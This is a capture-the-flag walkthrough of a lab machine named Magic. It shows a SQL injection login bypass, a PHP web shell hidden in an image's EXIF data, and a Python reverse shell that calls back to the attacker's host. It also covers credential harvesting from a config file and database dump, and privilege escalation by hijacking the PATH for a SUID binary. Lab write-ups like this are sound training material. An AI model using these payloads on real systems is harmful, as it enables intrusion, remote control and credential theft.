Reconnaissance & Enumeration
Let’s start by looking at what ports are open:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nmap -sS -sC -sV -p- 10.10.10.185
[sudo] Mot de passe de fukurou :
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 15:17 CEST
Nmap scan report for 10.10.10.185
Host is up (0.046s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.53 seconds
So we know that there is a website on port 80 let’s check it out:
Let’s see what the login page looks like:
Exploitation
SQL Injection
Now that we have the login page, let’s try to go through with SQLi
1
2
admin' or '1'='1'
password
And we have access to the upload page:
Upload exploitation
So it seems that it is checking for file extension so we can instead use the exiftool to add some php code to any image we download
1
exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.png
Let’s rename the image to test.php.png to be able to use it:
1
mv test.png test.php.png
and now upload the image to the site and let’s try it out
1
http://10.10.10.185/images/uploads/test.php.png?cmd=ls
In the big jumble mess, in the upper right corener we can see the result of ls so we know that it is working. Now let’s execute a python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[YOUR IP]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Pop that into the url and get a netcat shell
1
2
3
4
5
6
nc -lvnp 1234
listening on [any] 1234 ...
connect to [[YOUR IP]] from (UNKNOWN) [10.10.10.185] 59852
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/Magic/images/uploads$
We now have a shell in the website.
Get the USER flag
We know that this website uses sql so there must be some db related files in there. After a little bit of research (not too long) I found db.php5:
db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
private static $cont = null;
public function __construct() {
die('Init function is not allowed');
}
public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}
public static function disconnect()
{
self::$cont = null;
}
}
Now we have a user and a password for the database
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
mysqldump --databases Magic -u theseus -p iamkingtheseus
<dump --databases Magic -u theseus -p iamkingtheseus
Enter password: iamkingtheseus
-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database: Magic
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Current Database: `Magic`
--
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;
USE `Magic`;
--
-- Table structure for table `login`
--
DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
`id` int(6) NOT NULL AUTO_INCREMENT,
`username` varchar(50) NOT NULL,
`password` varchar(100) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `login`
--
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
mysqldump: Got error: 1044: Access denied for user 'theseus'@'localhost' to database 'iamkingtheseus' when selecting the database
We still get an error but we don’t really care as we now have a new password from the tables regardless. Let’s try to log on as theseus with this password
1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@ubuntu:/var/www/Magic$ su theseus
su theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:/var/www/Magic$ cd
cd
theseus@ubuntu:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
theseus@ubuntu:~$ cat user.txt
cat user.txt
0e...........................c0
Priviledge Escalation
Sysinfo
After some digging you encounter sysinfo which isn’t native to linux but is a custom programm that outputs the same as the following:
lshw -short= Hardware Infofdisk -l= Disk Infocat /proc/cpuinfo= CPU Infofree -h= MEM Usage
So localy I wrote a file called lshw with the python command we use earlier in it
lshw
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[YOUR IP]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now let’s download this file using wget onto the machine and give it the appropriate permissions:
1
2
3
4
5
6
7
8
9
10
11
12
13
theseus@ubuntu:/tmp$ wget http://[YOUR IP]:8000/lshw
wget http://[YOUR IP]:8000/lshw
--2020-08-04 07:06:19-- http://[YOUR IP]:8000/lshw
Connecting to [YOUR IP]:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 228 [application/octet-stream]
Saving to: ‘lshw’
lshw 100%[===================>] 228 --.-KB/s in 0s
2020-08-04 07:06:19 (29.8 MB/s) - ‘lshw’ saved [228/228]
theseus@ubuntu:/tmp$ chmod 755 lshw
Now listen with netcat on you local machine and execute sysinfo:
1
2
3
4
5
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.10.185] 59856
python3 -c "import pty; pty.spawn('/bin/bash')"
root@ubuntu:/tmp#
GET root flag
Now let’s get that flag
1
2
3
4
5
6
7
8
9
root@ubuntu:~# cd /root
cd /root
root@ubuntu:/root# ls
ls
info.c root.txt
root@ubuntu:/root# cat root.txt
cat root.txt
c5.........................00
root@ubuntu:/root#
Yay we got it